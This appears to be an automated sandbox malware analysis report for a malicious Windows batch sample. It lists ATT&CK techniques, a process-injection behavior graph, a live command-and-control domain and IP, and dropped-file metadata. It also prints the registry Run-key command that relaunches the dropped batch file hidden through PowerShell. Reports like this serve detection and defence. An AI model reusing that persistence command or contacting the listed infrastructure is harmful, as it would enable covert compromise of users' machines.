Gather Victim Network InformationServerCloud Accounts1
PowerShell
Network Logon Script21
Registry Run Keys / Startup Folder
11
File Deletion
LSA Secrets2
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
Masquerading
Cached Domain Credentials141
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
Virtualization/Sandbox Evasion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron713
Process Injection
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Hidden Files and Directories
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519360 Sample: Q5N7WOpk8J.bat Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 75 fixed-noon.gl.at.ply.gg 2->75 87 Malicious sample detected (through community Yara rule) 2->87 89 .NET source code references suspicious native API functions 2->89 91 Found large BAT file 2->91 93 10 other signatures 2->93 13 cmd.exe 1 2->13         started        16 powershell.exe 2 14 2->16         started        signatures3 process4 signatures5 119 Suspicious powershell command line found 13->119 121 Suspicious command line found 13->121 18 powershell.exe 33 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 123 Writes to foreign memory regions 16->123 125 Modifies the context of a thread in another process (thread injection) 16->125 127 Injects a PE file into a foreign processes 16->127 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 73 C:\Windows\$cnt-onimai2\$cnt-CO2.bat, DOS 18->73 dropped 95 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 18->97 99 Deletes itself after installation 18->99 107 3 other signatures 18->107 32 cmd.exe 1 18->32         started        101 Injects code into the Windows Explorer (explorer.exe) 26->101 103 Contains functionality to inject code into remote processes 26->103 105 Writes to foreign memory regions 26->105 109 3 other signatures 26->109 35 lsass.exe 26->35 injected 37 winlogon.exe 26->37 injected 39 svchost.exe 26->39 injected 41 19 other processes 26->41 signatures8 process9 signatures10 79 Suspicious powershell command line found 32->79 43 powershell.exe 32->43         started        45 conhost.exe 32->45         started        47 cmd.exe 1 32->47         started        81 Writes to foreign memory regions 35->81 process11 process12 49 cmd.exe 1 43->49         started        signatures13 83 Suspicious powershell command line found 49->83 85 Suspicious command line found 49->85 52 powershell.exe 49->52         started        56 WMIC.exe 1 49->56         started        58 WMIC.exe 1 49->58         started        60 4 other processes 49->60 process14 dnsIp15 77 fixed-noon.gl.at.ply.gg 147.185.221.21, 43063, 49704, 49706 SALSGIVERUS United States 52->77 111 Creates autostart registry keys with suspicious values (likely registry only malware) 52->111 113 Creates an autostart registry key pointing to binary in C:\Windows 52->113 115 Writes to foreign memory regions 52->115 117 4 other signatures 52->117 62 powershell.exe 25 52->62         started        65 schtasks.exe 1 52->65         started        signatures16 process17 signatures18 129 Injects a PE file into a foreign processes 62->129 67 conhost.exe 62->67         started        69 powershell.exe 1 62->69         started        71 conhost.exe 65->71         started        process19

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Q5N7WOpk8J.bat5%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore6lB0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%Avira URL Cloudsafe
http://schemas.xmlsoap.org/wsdl/erties0%Avira URL Cloudsafe
http://www.microsoft.co0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/02/trust0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2004/09/policy0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%Avira URL Cloudsafe
http://osoft.co_2010-06X0%Avira URL Cloudsafe
https://aka.ms/pscore60%Avira URL Cloudsafe
https://aka.ms/pscore6xG0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/wsdl/soap12/0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/wsdl/soap12/P0%Avira URL Cloudsafe
http://docs.oasis-open.org/ws-sx/ws-trust/2005120%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
fixed-noon.gl.at.ply.gg
147.185.221.21
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1782893457.0000022553606000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://go.micropowershell.exe, 0000001F.00000002.1721914542.0000000004B7E000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.0000022544537000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://www.microsoft.copowershell.exe, 0000001C.00000002.2582592415.0000022F1DD57000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://contoso.com/Licensepowershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://contoso.com/Iconpowershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://osoft.co_2010-06Xdwm.exe, 00000029.00000000.1764744714.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.2625112996.00000262ED790000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://aka.ms/pscore6powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, Null.14.drfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/Pester/Pesterpowershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2553174289.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746323594.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://aka.ms/pscore6lBpowershell.exe, 0000001F.00000002.1721914542.00000000048C1000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://contoso.com/powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://nuget.org/nuget.exepowershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    https://aka.ms/pscore6xGpowershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://aka.ms/pscore68powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.00000225433F1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000027.00000002.2553174289.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746323594.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1721914542.00000000048C1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.00000225433F1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    147.185.221.21
    fixed-noon.gl.at.ply.ggUnited States
    12087SALSGIVERUSfalse
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1519360
    Start date and time:2024-09-26 12:19:13 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 10m 57s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:40
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:20
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Sample name:Q5N7WOpk8J.bat
    renamed because original name is a hash value
    Original Sample Name:5c6dbf4219fd4e2251de392eb2544581.bat
    Detection:MAL
    Classification:mal100.spyw.evad.winBAT@51/21@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 68
    • Number of non-executed functions: 315
    Cookbook Comments:
    • Found application associated with file extension: .bat
    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 20.190.159.23, 40.126.31.67, 20.190.159.71, 20.190.159.4, 20.190.159.2, 40.126.31.69, 20.190.159.75, 40.126.31.71, 20.189.173.21
    • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
    • Not all processes where analyzed, report is missing behavior information
    • Report creation exceeded maximum time and may have missing disassembly code information.
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtFsControlFile calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • VT rate limit hit for: Q5N7WOpk8J.bat
    TimeTypeDescription
    06:20:08API Interceptor4x Sleep call for process: WMIC.exe modified
    06:20:13API Interceptor85795x Sleep call for process: powershell.exe modified
    07:23:18API Interceptor85256x Sleep call for process: winlogon.exe modified
    07:23:20API Interceptor73552x Sleep call for process: dwm.exe modified
    07:23:20API Interceptor54222x Sleep call for process: lsass.exe modified
    07:23:21API Interceptor7128x Sleep call for process: svchost.exe modified
    07:23:35API Interceptor209x Sleep call for process: cmd.exe modified
    07:23:35API Interceptor212x Sleep call for process: conhost.exe modified
    07:23:42API Interceptor90x Sleep call for process: dllhost.exe modified
    13:22:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows_Log cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
    13:23:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows_Log cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    147.185.221.21NzEsfIiAc0.exeGet hashmaliciousXWormBrowse
      Y666Gn09a1.exeGet hashmaliciousXWormBrowse
        Uhj9qfwbYG.exeGet hashmaliciousAsyncRAT, XWormBrowse
          WIN CHANGER 2.3.exeGet hashmaliciousXWormBrowse
            jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
              PCCooker2.0_x64.exeGet hashmaliciousAsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRatBrowse
                JFhDGHXmW6.exeGet hashmaliciousUnknownBrowse
                  N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                    N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                      SenditIllrunitinmyvirtualmachineinsidemyvirtualmachine.batGet hashmaliciousUnknownBrowse
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        SALSGIVERUSSecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                        • 147.185.221.22
                        3EtS1ncqvJ.exeGet hashmaliciousNjratBrowse
                        • 147.185.221.19
                        hfKx2T5IfT.exeGet hashmaliciousNjratBrowse
                        • 147.185.221.19
                        BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                        • 147.185.221.22
                        It8DXmSFEk.exeGet hashmaliciousNjratBrowse
                        • 147.185.221.19
                        6Mt223MA25.exeGet hashmaliciousArrowRATBrowse
                        • 147.185.221.18
                        IWsK3V2Ul9.exeGet hashmaliciousArrowRATBrowse
                        • 147.185.221.17
                        SecuriteInfo.com.FileRepMalware.32767.25187.exeGet hashmaliciousUnknownBrowse
                        • 147.185.221.20
                        SecuriteInfo.com.Trojan.Siggen29.35475.19245.6407.exeGet hashmaliciousSheetRatBrowse
                        • 147.185.221.17
                        jQ2ryeS5ZP.exeGet hashmaliciousPureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog StealerBrowse
                        • 147.185.221.22
                        No context
                        No context
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):9713
                        Entropy (8bit):4.940954773740904
                        Encrypted:false
                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                        MD5:BA7C69EBE30EC7DA697D2772E36A746D
                        SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                        SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                        SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                        Malicious:false
                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2916
                        Entropy (8bit):5.383067491382605
                        Encrypted:false
                        SSDEEP:48:4KAAzsSU4y4RQmFoUL5a+m9qr9t5/78NfpH4GxJaGaxIZVEouNHJBVrH/jCB:MAzlHyIFKEg9qrh7KfpRJlPEo2dL8
                        MD5:CE4F67AB438CDEF15E3BD3CE128F7B38
                        SHA1:8B86E68E73D6ECD678C1E4CC49E863C9D1A307DC
                        SHA-256:CFF3A5491628B5ADC8D112521892A222CFE27303E63990B9DFA72A7C6785A781
                        SHA-512:0DEDEA7D9CE75EACD04911A94ACA309B13DF891DFA6C58933192A54F091E23591256823B4D685A107A983EFB46C2AA189EB18BA4BCDCCBEFDD5DBD75D80E6F93
                        Malicious:false
                        Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):352
                        Entropy (8bit):7.416107800458223
                        Encrypted:false
                        SSDEEP:6:68xozOFc9+pP6IRdYn4jNWGObVeVHaMv558vc/G0BUV/e8UVORVIwFzvBGih:hxo6e9+h6IrY4ZWrRelaML3UoRVGVHzT
                        MD5:CE78A2266E4AC5659C996AA019D615D4
                        SHA1:D7AE13C52B60A0602AB229F7889A779CBC35DE9A
                        SHA-256:5F74F14D0DAC60B604F7FFAA2A134C21DF900C8247F1FC125FA654521399CCC4
                        SHA-512:BC12389DA603D05C015E5F4B0B1D6AB3A2E11D7AFFF6CF9E3DF94CFAFD8F16E19EB4F5BCC8A589C98EC47120ECC9734059AF766ACDB7BEFC0451E28DE1DD89EC
                        Malicious:false
